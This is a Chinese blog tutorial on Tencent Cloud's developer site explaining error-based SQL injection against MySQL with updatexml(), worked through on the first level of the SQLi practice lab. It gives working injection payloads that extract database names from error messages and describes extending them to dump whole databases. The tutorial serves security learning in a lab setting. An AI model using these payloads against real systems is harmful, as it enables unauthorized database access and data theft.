前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >SQL注入攻击(SQL注入(SQLi)攻击)-报错注入

SQL注入攻击(SQL注入(SQLi)攻击)-报错注入

作者头像
红目香薰
发布2022-11-29 15:24:05
2.6K0
发布2022-11-29 15:24:05
举报
文章被收录于专栏:CSDNToQQCode

页面没有显示位 , 但有数据库的报错信息时 , 可使用报错注入

报错注入是最常用的注入方式 , 也是使用起来最方便(我觉得)的一种注入方式

代码语言:javascript
复制
updatexml(1,'~',3);
  • 第二个参数包含特殊字符时,数据库会报错,并将第二个参数的内容显示在报错内容中
  • 返回结果的长度不超过32个字符
  • MySQL5.1及以上版本使用

本次以SQLi第一关为案例

第一步,判断注入类型

我们在参数中加入一个单引号 ' , 看其会不会报错

代码语言:javascript
复制
?id=1'

数据库返回了一个错误 , 从错误来看 , 最外层的一对单引号来自数据库的报错格式 , 我们不用管

1 是我们传递的参数 , 1旁边的一对单引号 , 是SQL中包裹参数的单引号

而 1 右边的一个单引号 , 是我们添加的单引号

也就是说 , 后台SQL中传递参数时 , 参数包裹的就是单引号 , 固 单引号字符串型注入

第二步,脱库

我们先来测试一下 , updatexml()是否能正常报错

代码语言:javascript
复制
?id=1' and updatexml(1,concat('~','my par'),3) -- a

 concat() , 用来拼接字符串 , 触发updatexml()的报错 

数据库把我们的第二个参数返回到页面了 

我们把第二个参数 替换成查询语句 , 即可获取到数据库信息

代码语言:javascript
复制
?id=1' and updatexml(1,concat('~',
(select schema_name from information_schema.schemata limit 0,1)
),3) -- a

 我们把第二个参数 替换成查询语句 , 即可获取到数据库信息

代码语言:javascript
复制
?id=1' and updatexml(1,concat('~',
(select schema_name from information_schema.schemata limit 0,1)
),3) -- a

使用分页来查询第几个数据库 , 0开始

接下来可以将'~' 后面的SQL替换成其他的查询语句 , 从而实现脱库 

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-09-24,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 第一步,判断注入类型
  • 第二步,脱库
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档